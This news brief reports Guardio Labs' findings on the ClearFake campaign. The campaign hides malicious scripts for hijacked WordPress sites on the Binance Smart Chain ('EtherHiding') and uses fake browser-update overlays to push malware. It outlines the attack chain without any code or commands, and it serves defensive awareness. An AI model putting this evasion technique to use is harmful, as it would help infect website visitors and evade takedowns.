BleepingComputer reports that malicious scripts for compromising WordPress sites have been concealed in the blockchain by the ClearFake threat operation using the new EtherHiding code distribution technique that leverages the Binance Smart Chain in a bid to better evade detection.
Vulnerable WordPress sites have been targeted with script injections that load the BSC JS library, which then facilitates retrieval and injection of malicious blockchain-stored scripts before prompting third-stage payload downloads from the command-and-control server, a report from Guardio Labs revealed. Such payloads enable fraudulent site overlays urging browser updates, which when clicked would redirect to sites for downloading a malicious executable.
Such an attack technique by ClearFake comes after the operation used various hijacked WordPress sites to facilitate malicious injections through Cloudflare Worker hosts during the past two months.
"While their initial method of hosting code on abused Cloudflare Worker hosts was taken down, they've quickly pivoted to take advantage of the decentralized, anonymous, and public nature of blockchain. This campaign is up and harder than ever to detect and take down," said Guardio Labs.